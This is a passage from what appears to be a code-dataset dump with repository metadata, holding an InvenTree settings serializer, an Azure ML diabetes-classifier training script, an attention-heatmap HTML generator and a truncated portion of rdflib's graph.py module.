gid_io.FinalizeResults()
| 33.467925 | 134 | 0.700755 |
4a27e3f30e68df4070b8924c9feda6e3a58dc632 | 1,831 | py | Python | InvenTree/common/serializers.py | andytorrestb/InvenTree | a24ad197414b7ec35cd602dc9190e86de5f66ad3 | [
"MIT"
] | 1 | 2021-11-18T12:32:03.000Z | 2021-11-18T12:32:03.000Z | InvenTree/common/serializers.py | andytorrestb/InvenTree | a24ad197414b7ec35cd602dc9190e86de5f66ad3 | [
"MIT"
] | null | null | null | InvenTree/common/serializers.py | andytorrestb/InvenTree | a24ad197414b7ec35cd602dc9190e86de5f66ad3 | [
"MIT"
] | null | null | null | """
JSON serializers for common components
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from InvenTree.serializers import InvenTreeModelSerializer
from rest_framework import serializers
from common.models import InvenTreeSetting, InvenTreeUserSetting
class SettingsSerializer(InvenTreeModelSerializer):
"""
Base serializer for a settings object
"""
key = serializers.CharField(read_only=True)
name = serializers.CharField(read_only=True)
description = serializers.CharField(read_only=True)
type = serializers.CharField(source='setting_type', read_only=True)
choices = serializers.SerializerMethodField()
def get_choices(self, obj):
"""
Returns the choices available for a given item
"""
results = []
choices = obj.choices()
if choices:
for choice in choices:
results.append({
'value': choice[0],
'display_name': choice[1],
})
return results
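    # Example of the returned shape (illustrative choice tuple, not an actual
    # InvenTree setting): ('mm', 'Millimetre') is rendered as
    # [{'value': 'mm', 'display_name': 'Millimetre'}].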
class GlobalSettingsSerializer(SettingsSerializer):
"""
Serializer for the InvenTreeSetting model
"""
class Meta:
model = InvenTreeSetting
fields = [
'pk',
'key',
'value',
'name',
'description',
'type',
'choices',
]
class UserSettingsSerializer(SettingsSerializer):
"""
Serializer for the InvenTreeUserSetting model
"""
user = serializers.PrimaryKeyRelatedField(read_only=True)
class Meta:
model = InvenTreeUserSetting
fields = [
'pk',
'key',
'value',
'name',
'description',
'user',
'type',
'choices',
]
| 21.290698 | 71 | 0.57728 |
4a27e439cf3ecc1f0918ad3b51bf5141028f20d7 | 2,299 | py | Python | scripts/diabetes_training_file.py | rohitashwachaks/dp100 | 7223e75688b0982f757f2a92ecb7b86a71c3f20b | [
"MIT"
] | null | null | null | scripts/diabetes_training_file.py | rohitashwachaks/dp100 | 7223e75688b0982f757f2a92ecb7b86a71c3f20b | [
"MIT"
] | null | null | null | scripts/diabetes_training_file.py | rohitashwachaks/dp100 | 7223e75688b0982f757f2a92ecb7b86a71c3f20b | [
"MIT"
] | null | null | null | # Import libraries
import os
import argparse
from azureml.core import Dataset, Run
import pandas as pd
import numpy as np
import joblib
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
import glob
# Get script arguments (regularization rate and file dataset mount point)
parser = argparse.ArgumentParser()
parser.add_argument('--regularization', type=float, dest='reg_rate', default=0.01, help='regularization rate')
parser.add_argument('--input-data', type=str, dest='dataset_folder', help='data mount point')
args = parser.parse_args()
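# Illustrative invocation (placeholder values):
#   python diabetes_training_file.py --regularization 0.05 --input-data /path/to/mounted/csv/folder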
# Set regularization hyperparameter (passed as an argument to the script)
reg = args.reg_rate
# Get the experiment run context
run = Run.get_context()
# load the diabetes dataset
print("Loading Data...")
data_path = run.input_datasets['training_files'] # Get the training data path from the input
# (You could also just use args.dataset_folder if you don't want to rely on a hard-coded friendly name)
# Read the files
all_files = glob.glob(data_path + "/*.csv")
diabetes = pd.concat((pd.read_csv(f) for f in all_files), sort=False)
# Separate features and labels
X, y = diabetes[['Pregnancies','PlasmaGlucose','DiastolicBloodPressure','TricepsThickness','SerumInsulin','BMI','DiabetesPedigree','Age']].values, diabetes['Diabetic'].values
# Split data into training set and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=0)
# Train a logistic regression model
print('Training a logistic regression model with regularization rate of', reg)
run.log('Regularization Rate', np.float(reg))
model = LogisticRegression(C=1/reg, solver="liblinear").fit(X_train, y_train)
# calculate accuracy
y_hat = model.predict(X_test)
acc = np.average(y_hat == y_test)
print('Accuracy:', acc)
run.log('Accuracy', np.float(acc))
# calculate AUC
y_scores = model.predict_proba(X_test)
auc = roc_auc_score(y_test,y_scores[:,1])
print('AUC: ' + str(auc))
run.log('AUC', np.float(auc))
os.makedirs('outputs', exist_ok=True)
# note file saved in the outputs folder is automatically uploaded into experiment record
joblib.dump(value=model, filename='outputs/diabetes_model.pkl')
run.complete() | 37.080645 | 174 | 0.77251 |
4a27e62bd86932f44883ba5c7db8012df411c4be | 2,859 | py | Python | code/utils.py | Run542968/Self_Attention_Pytorch | 35b5c520904c709f35a9d3e44c0cdba92a35d10b | [
"Apache-2.0"
] | null | null | null | code/utils.py | Run542968/Self_Attention_Pytorch | 35b5c520904c709f35a9d3e44c0cdba92a35d10b | [
"Apache-2.0"
] | null | null | null | code/utils.py | Run542968/Self_Attention_Pytorch | 35b5c520904c709f35a9d3e44c0cdba92a35d10b | [
"Apache-2.0"
] | null | null | null | from codecs import open
import torch
def visualize_attention(wts,x_test_pad,word_to_id,filename):
wts_add = torch.sum(wts,1)
wts_add_np = wts_add.data.numpy()
wts_add_list = wts_add_np.tolist()
print(wts_add_list)
print(len(wts_add_list))
id_to_word = {v:k for k,v in word_to_id.items()}
text= []
for test in x_test_pad:
text.append(" ".join([id_to_word.get(i) for i in test]))
createHTML(text, wts_add_list, filename)
print("Attention visualization created for {} samples".format(len(x_test_pad)))
return
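# Illustrative call (placeholder names): given attention weights `wts` of shape
# (batch, hops, seq_len), padded token ids `x_test_pad` and a `word_to_id` vocabulary,
# this writes visualization/attention.html:
#   visualize_attention(wts, x_test_pad, word_to_id, "attention.html")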
def createHTML(texts, weights, fileName):
fileName = "visualization/" + fileName
fOut = open(fileName, "w", encoding="utf-8")
part1 = """
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<style>
body {
font-family: Sans-Serif;
}
</style>
</head>
<body>
<h3>
Heatmaps
</h3>
</body>
<script>
"""
part2 = """
var color = "255,0,0";
var ngram_length = 3;
var half_ngram = 1;
for (var k=0; k < any_text.length; k++) {
var tokens = any_text[k].split(" ");
var intensity = new Array(tokens.length);
var max_intensity = Number.MIN_SAFE_INTEGER;
var min_intensity = Number.MAX_SAFE_INTEGER;
for (var i = 0; i < intensity.length; i++) {
intensity[i] = 0.0;
for (var j = -half_ngram; j < ngram_length-half_ngram; j++) {
if (i+j < intensity.length && i+j > -1) {
intensity[i] += trigram_weights[k][i + j];
}
}
if (i == 0 || i == intensity.length-1) {
intensity[i] /= 2.0;
} else {
intensity[i] /= 3.0;
}
if (intensity[i] > max_intensity) {
max_intensity = intensity[i];
}
if (intensity[i] < min_intensity) {
min_intensity = intensity[i];
}
}
var denominator = max_intensity - min_intensity;
for (var i = 0; i < intensity.length; i++) {
intensity[i] = (intensity[i] - min_intensity) / denominator;
}
if (k%2 == 0) {
var heat_text = "<p><br><b>Example:</b><br>";
} else {
var heat_text = "<b>Example:</b><br>";
}
var space = "";
for (var i = 0; i < tokens.length; i++) {
heat_text += "<span style='background-color:rgba(" + color + "," + intensity[i] + ")'>" + space + tokens[i] + "</span>";
if (space == "") {
space = " ";
}
}
//heat_text += "<p>";
document.body.innerHTML += heat_text;
}
</script>
</html>"""
putQuote = lambda x: "\"%s\"" % x
textsString = "var any_text = [%s];\n" % (",".join(map(putQuote, texts)))
weightsString = "var trigram_weights = [%s];\n" % (",".join(map(str, weights)))
fOut.write(part1)
fOut.write(textsString)
fOut.write(weightsString)
fOut.write(part2)
fOut.close()
return
| 28.306931 | 124 | 0.564533 |
4a27e6de72ab7c0fd56731ed9995d1ba7d1ad357 | 66,785 | py | Python | rdflib/graph.py | mwatts15/rdflib | 047e3e9781a28966ff9b6fd46ec20e459a5a0f11 | [
"BSD-3-Clause"
] | 1 | 2021-08-09T16:32:00.000Z | 2021-08-09T16:32:00.000Z | rdflib/graph.py | mwatts15/rdflib | 047e3e9781a28966ff9b6fd46ec20e459a5a0f11 | [
"BSD-3-Clause"
] | null | null | null | rdflib/graph.py | mwatts15/rdflib | 047e3e9781a28966ff9b6fd46ec20e459a5a0f11 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from rdflib.term import Literal # required for doctests
assert Literal # avoid warning
from rdflib.namespace import Namespace # required for doctests
assert Namespace # avoid warning
__doc__ = """\
RDFLib defines the following kinds of Graphs:
* :class:`~rdflib.graph.Graph`
* :class:`~rdflib.graph.QuotedGraph`
* :class:`~rdflib.graph.ConjunctiveGraph`
* :class:`~rdflib.graph.Dataset`
Graph
-----
An RDF graph is a set of RDF triples. Graphs support the python ``in``
operator, as well as iteration and some operations like union,
difference and intersection.
see :class:`~rdflib.graph.Graph`
Conjunctive Graph
-----------------
A Conjunctive Graph is the most relevant collection of graphs that are
considered to be the boundary for closed world assumptions. This
boundary is equivalent to that of the store instance (which is itself
uniquely identified and distinct from other instances of
:class:`Store` that signify other Conjunctive Graphs). It is
equivalent to all the named graphs within it and associated with a
``_default_`` graph which is automatically assigned a :class:`BNode`
for an identifier - if one isn't given.
see :class:`~rdflib.graph.ConjunctiveGraph`
Quoted graph
------------
The notion of an RDF graph [14] is extended to include the concept of
a formula node. A formula node may occur wherever any other kind of
node can appear. Associated with a formula node is an RDF graph that
is completely disjoint from all other graphs; i.e. has no nodes in
common with any other graph. (It may contain the same labels as other
RDF graphs; because this is, by definition, a separate graph,
considerations of tidiness do not apply between the graph at a formula
node and any other graph.)
This is intended to map the idea of "{ N3-expression }" that is used
by N3 into an RDF graph upon which RDF semantics is defined.
see :class:`~rdflib.graph.QuotedGraph`
Dataset
-------
The RDF 1.1 Dataset, a small extension to the Conjunctive Graph. The
primary term is "graphs in the datasets" and not "contexts with quads"
so there is a separate method to set/retrieve a graph in a dataset and
to operate with dataset graphs. As a consequence of this approach,
dataset graphs cannot be identified with blank nodes, a name is always
required (RDFLib will automatically add a name if one is not provided
at creation time). This implementation includes a convenience method
to directly add a single quad to a dataset graph.
see :class:`~rdflib.graph.Dataset`
Working with graphs
===================
Instantiating Graphs with default store (IOMemory) and default identifier
(a BNode):
>>> g = Graph()
>>> g.store.__class__
<class 'rdflib.plugins.memory.IOMemory'>
>>> g.identifier.__class__
<class 'rdflib.term.BNode'>
Instantiating Graphs with a IOMemory store and an identifier -
<http://rdflib.net>:
>>> g = Graph('IOMemory', URIRef("http://rdflib.net"))
>>> g.identifier
rdflib.term.URIRef(u'http://rdflib.net')
>>> str(g) # doctest: +NORMALIZE_WHITESPACE
"<http://rdflib.net> a rdfg:Graph;rdflib:storage
[a rdflib:Store;rdfs:label 'IOMemory']."
Creating a ConjunctiveGraph - The top level container for all named Graphs
in a 'database':
>>> g = ConjunctiveGraph()
>>> str(g.default_context)
"[a rdfg:Graph;rdflib:storage [a rdflib:Store;rdfs:label 'IOMemory']]."
Adding / removing reified triples to Graph and iterating over it directly or
via triple pattern:
>>> g = Graph()
>>> statementId = BNode()
>>> print(len(g))
0
>>> g.add((statementId, RDF.type, RDF.Statement))
>>> g.add((statementId, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g.add((statementId, RDF.predicate, RDFS.label))
>>> g.add((statementId, RDF.object, Literal("Conjunctive Graph")))
>>> print(len(g))
4
>>> for s, p, o in g:
... print(type(s))
...
<class 'rdflib.term.BNode'>
<class 'rdflib.term.BNode'>
<class 'rdflib.term.BNode'>
<class 'rdflib.term.BNode'>
>>> for s, p, o in g.triples((None, RDF.object, None)):
... print(o)
...
Conjunctive Graph
>>> g.remove((statementId, RDF.type, RDF.Statement))
>>> print(len(g))
3
``None`` terms in calls to :meth:`~rdflib.graph.Graph.triples` can be
thought of as "open variables".
Graphs support set-theoretic operators: you can add/subtract graphs, as
well as take their intersection (with the multiplication operator g1*g2)
and xor (g1 ^ g2).
Note that BNode IDs are kept when doing set-theoretic operations; this
may or may not be what you want. Two named graphs within the same
application probably want to share BNode IDs, while two graphs with data
from different sources probably do not. If your BNode IDs are all
generated by RDFLib they are UUIDs and unique.
>>> g1 = Graph()
>>> g2 = Graph()
>>> u = URIRef(u'http://example.com/foo')
>>> g1.add([u, RDFS.label, Literal('foo')])
>>> g1.add([u, RDFS.label, Literal('bar')])
>>> g2.add([u, RDFS.label, Literal('foo')])
>>> g2.add([u, RDFS.label, Literal('bing')])
>>> len(g1 + g2) # adds bing as label
3
>>> len(g1 - g2) # removes foo
1
>>> len(g1 * g2) # only foo
1
>>> g1 += g2 # now g1 contains everything
Graph Aggregation - ConjunctiveGraphs and ReadOnlyGraphAggregate within
the same store:
>>> store = plugin.get('IOMemory', Store)()
>>> g1 = Graph(store)
>>> g2 = Graph(store)
>>> g3 = Graph(store)
>>> stmt1 = BNode()
>>> stmt2 = BNode()
>>> stmt3 = BNode()
>>> g1.add((stmt1, RDF.type, RDF.Statement))
>>> g1.add((stmt1, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g1.add((stmt1, RDF.predicate, RDFS.label))
>>> g1.add((stmt1, RDF.object, Literal("Conjunctive Graph")))
>>> g2.add((stmt2, RDF.type, RDF.Statement))
>>> g2.add((stmt2, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g2.add((stmt2, RDF.predicate, RDF.type))
>>> g2.add((stmt2, RDF.object, RDFS.Class))
>>> g3.add((stmt3, RDF.type, RDF.Statement))
>>> g3.add((stmt3, RDF.subject,
... URIRef(u'http://rdflib.net/store/ConjunctiveGraph')))
>>> g3.add((stmt3, RDF.predicate, RDFS.comment))
>>> g3.add((stmt3, RDF.object, Literal(
... "The top-level aggregate graph - The sum " +
... "of all named graphs within a Store")))
>>> len(list(ConjunctiveGraph(store).subjects(RDF.type, RDF.Statement)))
3
>>> len(list(ReadOnlyGraphAggregate([g1,g2]).subjects(
... RDF.type, RDF.Statement)))
2
ConjunctiveGraphs have a :meth:`~rdflib.graph.ConjunctiveGraph.quads` method
which returns quads instead of triples, where the fourth item is the Graph
(or subclass thereof) instance in which the triple was asserted:
>>> uniqueGraphNames = set(
... [graph.identifier for s, p, o, graph in ConjunctiveGraph(store
... ).quads((None, RDF.predicate, None))])
>>> len(uniqueGraphNames)
3
>>> unionGraph = ReadOnlyGraphAggregate([g1, g2])
>>> uniqueGraphNames = set(
... [graph.identifier for s, p, o, graph in unionGraph.quads(
... (None, RDF.predicate, None))])
>>> len(uniqueGraphNames)
2
Parsing N3 from a string
>>> g2 = Graph()
>>> src = '''
... @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
... @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
... [ a rdf:Statement ;
... rdf:subject <http://rdflib.net/store#ConjunctiveGraph>;
... rdf:predicate rdfs:label;
... rdf:object "Conjunctive Graph" ] .
... '''
>>> g2 = g2.parse(data=src, format='n3')
>>> print(len(g2))
4
Using Namespace class:
>>> RDFLib = Namespace('http://rdflib.net/')
>>> RDFLib.ConjunctiveGraph
rdflib.term.URIRef(u'http://rdflib.net/ConjunctiveGraph')
>>> RDFLib['Graph']
rdflib.term.URIRef(u'http://rdflib.net/Graph')
"""
import logging
logger = logging.getLogger(__name__)
# import md5
import random
import warnings
from hashlib import md5
from rdflib.namespace import RDF, RDFS, SKOS
from rdflib import plugin, exceptions, query
from rdflib.term import Node, URIRef, Genid
from rdflib.term import BNode
import rdflib.term
from rdflib.paths import Path
from rdflib.store import Store
from rdflib.serializer import Serializer
from rdflib.parser import Parser
from rdflib.parser import create_input_source
from rdflib.namespace import NamespaceManager
from rdflib.resource import Resource
from rdflib.collection import Collection
import os
import shutil
import tempfile
from six import BytesIO
from six import b
from six.moves.urllib.parse import urlparse
__all__ = [
'Graph', 'ConjunctiveGraph', 'QuotedGraph', 'Seq',
'ModificationException', 'Dataset',
'UnSupportedAggregateOperation', 'ReadOnlyGraphAggregate']
class Graph(Node):
"""An RDF Graph
The constructor accepts one argument, the 'store'
that will be used to store the graph data (see the 'store'
package for stores currently shipped with rdflib).
Stores can be context-aware or unaware. Unaware stores take up
(some) less space but cannot support features that require
context, such as true merging/demerging of sub-graphs and
provenance.
The Graph constructor can take an identifier which identifies the Graph
by name. If none is given, the graph is assigned a BNode for its
identifier.
For more on named graphs, see: http://www.w3.org/2004/03/trix/
"""
def __init__(self, store='default', identifier=None,
namespace_manager=None):
super(Graph, self).__init__()
self.__identifier = identifier or BNode()
if not isinstance(self.__identifier, Node):
self.__identifier = URIRef(self.__identifier)
if not isinstance(store, Store):
# TODO: error handling
self.__store = store = plugin.get(store, Store)()
else:
self.__store = store
self.__namespace_manager = namespace_manager
self.context_aware = False
self.formula_aware = False
self.default_union = False
def __get_store(self):
return self.__store
store = property(__get_store) # read-only attr
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier) # read-only attr
def _get_namespace_manager(self):
if self.__namespace_manager is None:
self.__namespace_manager = NamespaceManager(self)
return self.__namespace_manager
def _set_namespace_manager(self, nm):
self.__namespace_manager = nm
namespace_manager = property(_get_namespace_manager,
_set_namespace_manager,
doc="this graph's namespace-manager")
def __repr__(self):
return "<Graph identifier=%s (%s)>" % (self.identifier, type(self))
def __str__(self):
if isinstance(self.identifier, URIRef):
return ("%s a rdfg:Graph;rdflib:storage " +
"[a rdflib:Store;rdfs:label '%s'].") % (
self.identifier.n3(),
self.store.__class__.__name__)
else:
return ("[a rdfg:Graph;rdflib:storage " +
"[a rdflib:Store;rdfs:label '%s']].") % (
self.store.__class__.__name__)
def toPython(self):
return self
def destroy(self, configuration):
"""Destroy the store identified by `configuration` if supported"""
self.__store.destroy(configuration)
# Transactional interfaces (optional)
def commit(self):
"""Commits active transactions"""
self.__store.commit()
def rollback(self):
"""Rollback active transactions"""
self.__store.rollback()
def open(self, configuration, create=False):
"""Open the graph store
Might be necessary for stores that require opening a connection to a
database or acquiring some resource.
"""
return self.__store.open(configuration, create)
def close(self, commit_pending_transaction=False):
"""Close the graph store
Might be necessary for stores that require closing a connection to a
database or releasing some resource.
"""
self.__store.close(
commit_pending_transaction=commit_pending_transaction)
def add(self, triple):
"""Add a triple with self as context"""
s, p, o = triple
assert isinstance(s, Node), \
"Subject %s must be an rdflib term" % (s,)
assert isinstance(p, Node), \
"Predicate %s must be an rdflib term" % (p,)
assert isinstance(o, Node), \
"Object %s must be an rdflib term" % (o,)
self.__store.add((s, p, o), self, quoted=False)
def addN(self, quads):
"""Add a sequence of triple with context"""
self.__store.addN((s, p, o, c) for s, p, o, c in quads
if isinstance(c, Graph) and
c.identifier is self.identifier and
_assertnode(s, p, o)
)
def remove(self, triple):
"""Remove a triple from the graph
If the triple does not provide a context attribute, removes the triple
from all contexts.
"""
self.__store.remove(triple, context=self)
def triples(self, triple):
"""Generator over the triple store
Returns triples that match the given triple pattern. If triple pattern
does not provide a context, all contexts will be searched.
"""
s, p, o = triple
if isinstance(p, Path):
for _s, _o in p.eval(self, s, o):
yield (_s, p, _o)
else:
for (s, p, o), cg in self.__store.triples((s, p, o), context=self):
yield (s, p, o)
def __getitem__(self, item):
"""
A graph can be "sliced" as a shortcut for the triples method
The python slice syntax is (ab)used for specifying triples.
A generator over matches is returned,
the returned tuples include only the parts not given
>>> import rdflib
>>> g = rdflib.Graph()
>>> g.add((rdflib.URIRef('urn:bob'), rdflib.RDFS.label, rdflib.Literal('Bob')))
>>> list(g[rdflib.URIRef('urn:bob')]) # all triples about bob
[(rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'), rdflib.term.Literal(u'Bob'))]
>>> list(g[:rdflib.RDFS.label]) # all label triples
[(rdflib.term.URIRef(u'urn:bob'), rdflib.term.Literal(u'Bob'))]
>>> list(g[::rdflib.Literal('Bob')]) # all triples with bob as object
[(rdflib.term.URIRef(u'urn:bob'), rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'))]
Combined with SPARQL paths, more complex queries can be
written concisely:
Name of all Bobs friends:
g[bob : FOAF.knows/FOAF.name ]
Some label for Bob:
g[bob : DC.title|FOAF.name|RDFS.label]
All friends and friends of friends of Bob
g[bob : FOAF.knows * '+']
etc.
.. versionadded:: 4.0
"""
if isinstance(item, slice):
s, p, o = item.start, item.stop, item.step
if s is None and p is None and o is None:
return self.triples((s, p, o))
elif s is None and p is None:
return self.subject_predicates(o)
elif s is None and o is None:
return self.subject_objects(p)
elif p is None and o is None:
return self.predicate_objects(s)
elif s is None:
return self.subjects(p, o)
elif p is None:
return self.predicates(s, o)
elif o is None:
return self.objects(s, p)
else:
# all given
return (s, p, o) in self
elif isinstance(item, (Path, Node)):
return self.predicate_objects(item)
else:
raise TypeError("You can only index a graph by a single rdflib term or path, or a slice of rdflib terms.")
def __len__(self):
"""Returns the number of triples in the graph
If context is specified then the number of triples in the context is
returned instead.
"""
return self.__store.__len__(context=self)
def __iter__(self):
"""Iterates over all triples in the store"""
return self.triples((None, None, None))
def __contains__(self, triple):
"""Support for 'triple in graph' syntax"""
for triple in self.triples(triple):
return True
return False
def __hash__(self):
return hash(self.identifier)
def __cmp__(self, other):
if other is None:
return -1
elif isinstance(other, Graph):
return cmp(self.identifier, other.identifier)
else:
# Note if None is considered equivalent to owl:Nothing
# Then perhaps a graph with length 0 should be considered
# equivalent to None (if compared to it)?
return 1
def __eq__(self, other):
return isinstance(other, Graph) \
and self.identifier == other.identifier
def __lt__(self, other):
return (other is None) \
or (isinstance(other, Graph) and
self.identifier < other.identifier)
def __le__(self, other):
return self < other or self == other
def __gt__(self, other):
return (isinstance(other, Graph) and
self.identifier > other.identifier) \
or (other is not None)
def __ge__(self, other):
return self > other or self == other
def __iadd__(self, other):
"""Add all triples in Graph other to Graph.
BNode IDs are not changed."""
self.addN((s, p, o, self) for s, p, o in other)
return self
def __isub__(self, other):
"""Subtract all triples in Graph other from Graph.
BNode IDs are not changed."""
for triple in other:
self.remove(triple)
return self
def __add__(self, other):
"""Set-theoretic union
BNode IDs are not changed."""
retval = Graph()
for (prefix, uri) in set(
list(self.namespaces()) + list(other.namespaces())):
retval.bind(prefix, uri)
for x in self:
retval.add(x)
for y in other:
retval.add(y)
return retval
def __mul__(self, other):
"""Set-theoretic intersection.
BNode IDs are not changed."""
retval = Graph()
for x in other:
if x in self:
retval.add(x)
return retval
def __sub__(self, other):
"""Set-theoretic difference.
BNode IDs are not changed."""
retval = Graph()
for x in self:
            if x not in other:
retval.add(x)
return retval
def __xor__(self, other):
"""Set-theoretic XOR.
BNode IDs are not changed."""
return (self - other) + (other - self)
__or__ = __add__
__and__ = __mul__
# Conv. methods
def set(self, triple):
"""Convenience method to update the value of object
Remove any existing triples for subject and predicate before adding
(subject, predicate, object).
"""
(subject, predicate, object_) = triple
assert subject is not None, \
"s can't be None in .set([s,p,o]), as it would remove (*, p, *)"
assert predicate is not None, \
"p can't be None in .set([s,p,o]), as it would remove (s, *, *)"
self.remove((subject, predicate, None))
self.add((subject, predicate, object_))
def subjects(self, predicate=None, object=None):
"""A generator of subjects with the given predicate and object"""
for s, p, o in self.triples((None, predicate, object)):
yield s
def predicates(self, subject=None, object=None):
"""A generator of predicates with the given subject and object"""
for s, p, o in self.triples((subject, None, object)):
yield p
def objects(self, subject=None, predicate=None):
"""A generator of objects with the given subject and predicate"""
for s, p, o in self.triples((subject, predicate, None)):
yield o
def subject_predicates(self, object=None):
"""A generator of (subject, predicate) tuples for the given object"""
for s, p, o in self.triples((None, None, object)):
yield s, p
def subject_objects(self, predicate=None):
"""A generator of (subject, object) tuples for the given predicate"""
for s, p, o in self.triples((None, predicate, None)):
yield s, o
def predicate_objects(self, subject=None):
"""A generator of (predicate, object) tuples for the given subject"""
for s, p, o in self.triples((subject, None, None)):
yield p, o
def triples_choices(self, triple, context=None):
subject, predicate, object_ = triple
for (s, p, o), cg in self.store.triples_choices(
(subject, predicate, object_), context=self):
yield (s, p, o)
def value(self, subject=None, predicate=RDF.value, object=None,
default=None, any=True):
"""Get a value for a pair of two criteria
Exactly one of subject, predicate, object must be None. Useful if one
knows that there may only be one value.
It is one of those situations that occur a lot, hence this
'macro' like utility
Parameters:
subject, predicate, object -- exactly one must be None
default -- value to be returned if no values found
any -- if True, return any value in the case there is more than one,
else, raise UniquenessError
"""
retval = default
if (subject is None and predicate is None) or \
(subject is None and object is None) or \
(predicate is None and object is None):
return None
if object is None:
values = self.objects(subject, predicate)
if subject is None:
values = self.subjects(predicate, object)
if predicate is None:
values = self.predicates(subject, object)
try:
retval = next(values)
except StopIteration:
retval = default
else:
if any is False:
try:
next(values)
msg = ("While trying to find a value for (%s, %s, %s) the"
" following multiple values where found:\n" %
(subject, predicate, object))
triples = self.store.triples(
(subject, predicate, object), None)
for (s, p, o), contexts in triples:
msg += "(%s, %s, %s)\n (contexts: %s)\n" % (
s, p, o, list(contexts))
raise exceptions.UniquenessError(msg)
except StopIteration:
pass
return retval
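    # Usage sketch (illustrative; ``s`` is a hypothetical subject): ``value`` is the
    # convenient form when a single object is expected.
    #
    #   label = g.value(subject=s, predicate=RDFS.label)   # exactly one criterion is None
    #   g.value(s, RDFS.label, any=False)                  # raises UniquenessError if
    #                                                      # several labels exist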
def label(self, subject, default=''):
"""Query for the RDFS.label of the subject
Return default if no label exists or any label if multiple exist.
"""
if subject is None:
return default
return self.value(subject, RDFS.label, default=default, any=True)
def preferredLabel(self, subject, lang=None, default=None,
labelProperties=(SKOS.prefLabel, RDFS.label)):
"""
Find the preferred label for subject.
By default prefers skos:prefLabels over rdfs:labels. In case at least
one prefLabel is found returns those, else returns labels. In case a
language string (e.g., 'en', 'de' or even '' for no lang-tagged
literals) is given, only such labels will be considered.
Return a list of (labelProp, label) pairs, where labelProp is either
skos:prefLabel or rdfs:label.
>>> from rdflib import ConjunctiveGraph, URIRef, RDFS, Literal
>>> from rdflib.namespace import SKOS
>>> from pprint import pprint
>>> g = ConjunctiveGraph()
>>> u = URIRef(u'http://example.com/foo')
>>> g.add([u, RDFS.label, Literal('foo')])
>>> g.add([u, RDFS.label, Literal('bar')])
>>> pprint(sorted(g.preferredLabel(u)))
[(rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'),
rdflib.term.Literal(u'bar')),
(rdflib.term.URIRef(u'http://www.w3.org/2000/01/rdf-schema#label'),
rdflib.term.Literal(u'foo'))]
>>> g.add([u, SKOS.prefLabel, Literal('bla')])
>>> pprint(g.preferredLabel(u))
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'bla'))]
>>> g.add([u, SKOS.prefLabel, Literal('blubb', lang='en')])
>>> sorted(g.preferredLabel(u)) #doctest: +NORMALIZE_WHITESPACE
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'bla')),
(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'blubb', lang='en'))]
>>> g.preferredLabel(u, lang='') #doctest: +NORMALIZE_WHITESPACE
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'bla'))]
>>> pprint(g.preferredLabel(u, lang='en'))
[(rdflib.term.URIRef(u'http://www.w3.org/2004/02/skos/core#prefLabel'),
rdflib.term.Literal(u'blubb', lang='en'))]
"""
if default is None:
default = []
# setup the language filtering
if lang is not None:
if lang == '': # we only want not language-tagged literals
def langfilter(l): return l.language is None
else:
def langfilter(l): return l.language == lang
else: # we don't care about language tags
def langfilter(l): return True
for labelProp in labelProperties:
labels = list(filter(langfilter, self.objects(subject, labelProp)))
if len(labels) == 0:
continue
else:
return [(labelProp, l) for l in labels]
return default
def comment(self, subject, default=''):
"""Query for the RDFS.comment of the subject
Return default if no comment exists
"""
if subject is None:
return default
return self.value(subject, RDFS.comment, default=default, any=True)
def items(self, list):
"""Generator over all items in the resource specified by list
list is an RDF collection.
"""
chain = set([list])
while list:
item = self.value(list, RDF.first)
if item is not None:
yield item
list = self.value(list, RDF.rest)
if list in chain:
raise ValueError("List contains a recursive rdf:rest reference")
chain.add(list)
def transitiveClosure(self, func, arg, seen=None):
"""
Generates transitive closure of a user-defined
function against the graph
>>> from rdflib.collection import Collection
>>> g=Graph()
>>> a=BNode('foo')
>>> b=BNode('bar')
>>> c=BNode('baz')
>>> g.add((a,RDF.first,RDF.type))
>>> g.add((a,RDF.rest,b))
>>> g.add((b,RDF.first,RDFS.label))
>>> g.add((b,RDF.rest,c))
>>> g.add((c,RDF.first,RDFS.comment))
>>> g.add((c,RDF.rest,RDF.nil))
>>> def topList(node,g):
... for s in g.subjects(RDF.rest,node):
... yield s
>>> def reverseList(node,g):
... for f in g.objects(node,RDF.first):
... print(f)
... for s in g.subjects(RDF.rest,node):
... yield s
>>> [rt for rt in g.transitiveClosure(
... topList,RDF.nil)] # doctest: +NORMALIZE_WHITESPACE
[rdflib.term.BNode('baz'),
rdflib.term.BNode('bar'),
rdflib.term.BNode('foo')]
>>> [rt for rt in g.transitiveClosure(
... reverseList,RDF.nil)] # doctest: +NORMALIZE_WHITESPACE
http://www.w3.org/2000/01/rdf-schema#comment
http://www.w3.org/2000/01/rdf-schema#label
http://www.w3.org/1999/02/22-rdf-syntax-ns#type
[rdflib.term.BNode('baz'),
rdflib.term.BNode('bar'),
rdflib.term.BNode('foo')]
"""
if seen is None:
seen = {}
elif arg in seen:
return
seen[arg] = 1
for rt in func(arg, self):
yield rt
for rt_2 in self.transitiveClosure(func, rt, seen):
yield rt_2
def transitive_objects(self, subject, property, remember=None):
"""Transitively generate objects for the ``property`` relationship
Generated objects belong to the depth first transitive closure of the
``property`` relationship starting at ``subject``.
"""
if remember is None:
remember = {}
if subject in remember:
return
